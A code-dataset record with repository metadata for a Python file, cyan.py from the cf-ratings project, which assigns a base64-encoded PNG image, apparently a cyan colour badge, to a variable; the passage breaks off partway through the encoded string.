| 0
| 0
| 0
| 0
| 0
| 0.240196
| 204
| 9
| 68
| 22.666667
| 0.722581
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.142857
| 0
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
e956e8b50b68f045e84c6f7a41b9d0ba2cf323ea
| 105,735
|
py
|
Python
|
src/api/colors/cyan.py
|
Gummybearr/cf-ratings
|
04d1defa49e3f2babcb6cce1bf0fd1c4b046530c
|
[
"MIT"
] | null | null | null |
src/api/colors/cyan.py
|
Gummybearr/cf-ratings
|
04d1defa49e3f2babcb6cce1bf0fd1c4b046530c
|
[
"MIT"
] | null | null | null |
src/api/colors/cyan.py
|
Gummybearr/cf-ratings
|
04d1defa49e3f2babcb6cce1bf0fd1c4b046530c
|
[
"MIT"
] | null | null | null |
cyan = "data:image/png;base64,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